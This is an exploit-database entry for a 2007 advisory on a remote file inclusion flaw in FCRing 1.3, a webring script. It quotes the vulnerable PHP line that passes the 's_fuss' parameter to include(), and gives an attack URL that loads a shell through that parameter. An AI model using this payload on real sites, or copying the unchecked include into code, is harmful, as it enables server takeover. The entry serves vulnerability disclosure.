header-logo
Suggest Exploit
vendor:
FCRing Webringskript
by:
kezzap66345
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
CWE
Product Name: FCRing Webringskript
Affected Version From: FCRing 1.3
Affected Version To: FCRing 1.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FCRing 1.3 Webringskript

The FCRing 1.3 Webringskript has a vulnerability that allows remote attackers to include arbitrary files via the 's_fuss' parameter in fcring.php.

Mitigation:

Apply a patch or update to a newer version of the FCRing Webringskript.
Source

Exploit-DB raw data:

FCRing 1.3 Webringskript

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3
*****************
ERROR:


 if($s_fuss != "")
  include($s_fuss);      <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path/fcring.php?s_fuss=[SHELL]


**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*str0ke*shika********************************************************

# milw0rm.com [2007-02-23]